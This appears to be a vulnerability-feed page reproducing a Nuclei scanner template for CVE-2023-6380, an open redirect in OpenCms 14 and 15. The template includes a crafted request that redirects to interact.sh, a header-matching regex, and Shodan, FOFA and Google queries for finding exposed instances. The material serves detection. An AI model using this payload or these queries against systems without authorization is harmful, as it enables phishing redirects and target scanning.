OpenCms 14 & 15 - Open Redirect

30 Jun 2026 04:56:11 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

OpenCms 14 & 15 - Open Redirect vulnerability found in the 'Mercury' template

Related

| Reporter | Title | Published |
|---|---|---|
| CNNVD (cnnvd) | Alkacon Software OpenCMS Input Validation Error Vulnerability | 13 Dec 2023 00:00 |
| CVE (cve) | CVE-2023-6380 | 13 Dec 2023 10:54 |
| Cvelist (cvelist) | CVE-2023-6380 Open Redirect in Alkacon Software OpenCms | 13 Dec 2023 10:54 |
| NVD (nvd) | CVE-2023-6380 | 13 Dec 2023 11:15 |
| Prion (prion) | Open redirect | 13 Dec 2023 11:15 |
| Positive Technologies (ptsecurity) | PT-2023-32635 · Opencms · Opencms | 13 Dec 2023 00:00 |
| Vulnrichment (vulnrichment) | CVE-2023-6380 Open Redirect in Alkacon Software OpenCms | 13 Dec 2023 10:54 |

id: CVE-2023-6380

info:
  name: OpenCms 14 & 15 - Open Redirect
  author: MiguelSegoviaGil
  severity: medium
  description: |
    Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template
  impact: |
    Unauthenticated attackers can redirect users to malicious external sites via the uri parameter, potentially facilitating phishing attacks or malware distribution.
  remediation: |
    Update OpenCMS to version 16 or later.
  reference:
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6380
    cwe-id: CWE-601
    epss-score: 0.01594
    epss-percentile: 0.72654
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alkacon
    product: opencms
    shodan-query:
      - "/opencms/"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve,cve2023,redirect,opencms,alkacon,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220724aee3f1be2a27c3e6b204b0c095d19e7c47bbfee19a374883f74f2764be89a022100e8cafaab40ae96c33de1137b109918ba472183a34f2c3eb03842026e3e8fa4d7:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (current)
Vulners AI Score: 6.3 (Medium risk)
CVSS 3.1: 6.1
EPSS: 0.01594